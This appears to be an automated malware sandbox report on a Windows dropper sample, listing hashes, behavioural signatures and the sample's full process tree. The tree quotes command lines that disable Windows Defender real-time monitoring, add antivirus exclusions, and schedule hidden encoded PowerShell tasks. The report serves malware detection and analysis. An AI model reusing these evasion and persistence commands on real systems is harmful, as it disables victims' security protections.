Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
11/12/2023, 03:12
Static task
static1
Behavioral task
behavioral1
Sample
e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe
Resource
win7-20231020-en
General
-
Target
e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe
-
Size
7.2MB
-
MD5
ce3185730246203700a23e2bca796d99
-
SHA1
0df5c4d7f5352dbe6ffedf575282f09faedf788f
-
SHA256
e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8
-
SHA512
ce19257d2e6187e3071253b869f62dd119b52425ff58a46c8a644831d01d4652124f0323653a96703929b2a5bafcc2392d2102397cbf8cfc321e859126b8d8c2
-
SSDEEP
196608:91Orab2X1JKmRNu34cJcyd8/1cj+b3Y6pR0c9zw3Zzxaq:3Or2M1JKIuLJJdacw3Y6pR0cuf
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hlHvxOmTEzGU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\zlCauFJzutozcZAJ = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\cvlBDCdIHRUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hlHvxOmTEzGU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\zYDdeyryU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\UJbqbYGEalpLkUITJzR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DDDIXrwIFTXkC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\VYfzEhPxBNNTaEVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\zlCauFJzutozcZAJ = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\zlCauFJzutozcZAJ = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DDDIXrwIFTXkC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\cvlBDCdIHRUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\VYfzEhPxBNNTaEVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\UJbqbYGEalpLkUITJzR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\zYDdeyryU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\zlCauFJzutozcZAJ = "0" reg.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Executes dropped EXE 4 IoCs
pid Process 1916 Install.exe 2836 Install.exe 1000 NjIJeDk.exe 592 PzPPUFP.exe -
Loads dropped DLL 8 IoCs
pid Process 2080 e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe 1916 Install.exe 1916 Install.exe 1916 Install.exe 1916 Install.exe 2836 Install.exe 2836 Install.exe 2836 Install.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 9 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini NjIJeDk.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat PzPPUFP.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol NjIJeDk.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol NjIJeDk.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Drops file in Program Files directory 5 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak PzPPUFP.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja PzPPUFP.exe File created C:\Program Files (x86)\zYDdeyryU\FxDvaL.dll PzPPUFP.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi PzPPUFP.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi PzPPUFP.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\btngLezmYLEbkDGphz.job schtasks.exe File created C:\Windows\Tasks\qxdnhmFGwPNMbPaLO.job schtasks.exe File created C:\Windows\Tasks\VgITaIvscZwKwBA.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2636 schtasks.exe 2816 schtasks.exe 1332 schtasks.exe 2572 schtasks.exe 516 schtasks.exe 1976 schtasks.exe 3048 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 18 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 PzPPUFP.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" PzPPUFP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad PzPPUFP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections PzPPUFP.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix PzPPUFP.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" PzPPUFP.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" PzPPUFP.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 PzPPUFP.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings PzPPUFP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings PzPPUFP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft wscript.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 2540 powershell.EXE 2540 powershell.EXE 2540 powershell.EXE 1588 powershell.EXE 1588 powershell.EXE 1588 powershell.EXE 3004 powershell.EXE 3004 powershell.EXE 3004 powershell.EXE 2192 powershell.EXE 2192 powershell.EXE 2192 powershell.EXE 592 PzPPUFP.exe 592 PzPPUFP.exe 592 PzPPUFP.exe 592 PzPPUFP.exe 592 PzPPUFP.exe 592 PzPPUFP.exe 592 PzPPUFP.exe 592 PzPPUFP.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2540 powershell.EXE Token: SeDebugPrivilege 1588 powershell.EXE Token: SeDebugPrivilege 3004 powershell.EXE Token: SeDebugPrivilege 2192 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2080 wrote to memory of 1916 2080 e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe 28 PID 2080 wrote to memory of 1916 2080 e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe 28 PID 2080 wrote to memory of 1916 2080 e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe 28 PID 2080 wrote to memory of 1916 2080 e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe 28 PID 2080 wrote to memory of 1916 2080 e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe 28 PID 2080 wrote to memory of 1916 2080 e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe 28 PID 2080 wrote to memory of 1916 2080 e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe 28 PID 1916 wrote to memory of 2836 1916 Install.exe 29 PID 1916 wrote to memory of 2836 1916 Install.exe 29 PID 1916 wrote to memory of 2836 1916 Install.exe 29 PID 1916 wrote to memory of 2836 1916 Install.exe 29 PID 1916 wrote to memory of 2836 1916 Install.exe 29 PID 1916 wrote to memory of 2836 1916 Install.exe 29 PID 1916 wrote to memory of 2836 1916 Install.exe 29 PID 2836 wrote to memory of 2564 2836 Install.exe 31 PID 2836 wrote to memory of 2564 2836 Install.exe 31 PID 2836 wrote to memory of 2564 2836 Install.exe 31 PID 2836 wrote to memory of 2564 2836 Install.exe 31 PID 2836 wrote to memory of 2564 2836 Install.exe 31 PID 2836 wrote to memory of 2564 2836 Install.exe 31 PID 2836 wrote to memory of 2564 2836 Install.exe 31 PID 2836 wrote to memory of 2932 2836 Install.exe 33 PID 2836 wrote to memory of 2932 2836 Install.exe 33 PID 2836 wrote to memory of 2932 2836 Install.exe 33 PID 2836 wrote to memory of 2932 2836 Install.exe 33 PID 2836 wrote to memory of 2932 2836 Install.exe 33 PID 2836 wrote to memory of 2932 2836 Install.exe 33 PID 2836 wrote to memory of 2932 2836 Install.exe 33 PID 2932 wrote to memory of 2692 2932 forfiles.exe 35 PID 2932 wrote to memory of 2692 2932 forfiles.exe 35 PID 2932 wrote to memory of 2692 2932 forfiles.exe 35 PID 2932 wrote to memory of 2692 2932 forfiles.exe 35 PID 2932 wrote to memory of 2692 2932 forfiles.exe 35 PID 2932 wrote to memory of 2692 2932 forfiles.exe 35 PID 2932 wrote to memory of 2692 2932 forfiles.exe 35 PID 2564 wrote to memory of 2916 2564 forfiles.exe 36 PID 2564 wrote to memory of 2916 2564 forfiles.exe 36 PID 2564 wrote to memory of 2916 2564 forfiles.exe 36 PID 2564 wrote to memory of 2916 2564 forfiles.exe 36 PID 2564 wrote to memory of 2916 2564 forfiles.exe 36 PID 2564 wrote to memory of 2916 2564 forfiles.exe 36 PID 2564 wrote to memory of 2916 2564 forfiles.exe 36 PID 2692 wrote to memory of 2784 2692 cmd.exe 37 PID 2692 wrote to memory of 2784 2692 cmd.exe 37 PID 2692 wrote to memory of 2784 2692 cmd.exe 37 PID 2692 wrote to memory of 2784 2692 cmd.exe 37 PID 2692 wrote to memory of 2784 2692 cmd.exe 37 PID 2692 wrote to memory of 2784 2692 cmd.exe 37 PID 2692 wrote to memory of 2784 2692 cmd.exe 37 PID 2916 wrote to memory of 2724 2916 cmd.exe 38 PID 2916 wrote to memory of 2724 2916 cmd.exe 38 PID 2916 wrote to memory of 2724 2916 cmd.exe 38 PID 2916 wrote to memory of 2724 2916 cmd.exe 38 PID 2916 wrote to memory of 2724 2916 cmd.exe 38 PID 2916 wrote to memory of 2724 2916 cmd.exe 38 PID 2916 wrote to memory of 2724 2916 cmd.exe 38 PID 2692 wrote to memory of 2800 2692 cmd.exe 39 PID 2692 wrote to memory of 2800 2692 cmd.exe 39 PID 2692 wrote to memory of 2800 2692 cmd.exe 39 PID 2692 wrote to memory of 2800 2692 cmd.exe 39 PID 2692 wrote to memory of 2800 2692 cmd.exe 39 PID 2692 wrote to memory of 2800 2692 cmd.exe 39 PID 2692 wrote to memory of 2800 2692 cmd.exe 39 PID 2916 wrote to memory of 320 2916 cmd.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe"C:\Users\Admin\AppData\Local\Temp\e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Users\Admin\AppData\Local\Temp\7zS4663.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Users\Admin\AppData\Local\Temp\7zS49AD.tmp\Install.exe.\Install.exe /MmqydidDY "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2916 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:2724
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:320
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2692 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:2784
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2800
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ggPxzAMra" /SC once /ST 00:02:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2572
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ggPxzAMra"4⤵PID:2632
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ggPxzAMra"4⤵PID:1540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "btngLezmYLEbkDGphz" /SC once /ST 03:14:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt\EegACLSUUqqFDxe\NjIJeDk.exe\" Bp /Drsite_idNrT 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:516
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {8D014434-B477-4C22-A981-D2762D984554} S-1-5-21-2084844033-2744876406-2053742436-1000:GGPVHMXR\Admin:Interactive:[1]1⤵PID:3068
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2540 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2032
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1588 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:904
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3004 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2796
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2192 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:3016
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1196
-
C:\Windows\system32\taskeng.exetaskeng.exe {A7BFDB3D-2986-443E-9685-144998B70F9D} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1888
-
C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt\EegACLSUUqqFDxe\NjIJeDk.exeC:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt\EegACLSUUqqFDxe\NjIJeDk.exe Bp /Drsite_idNrT 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1000 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gThcjpGwI" /SC once /ST 00:47:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1976
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gThcjpGwI"3⤵PID:1792
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gThcjpGwI"3⤵PID:1972
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:2144
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1608
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:3052
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:2164
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gwliQqMVJ" /SC once /ST 00:19:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:3048
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gwliQqMVJ"3⤵PID:2936
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gwliQqMVJ"3⤵PID:2992
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:323⤵PID:2884
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1960
-
-
-
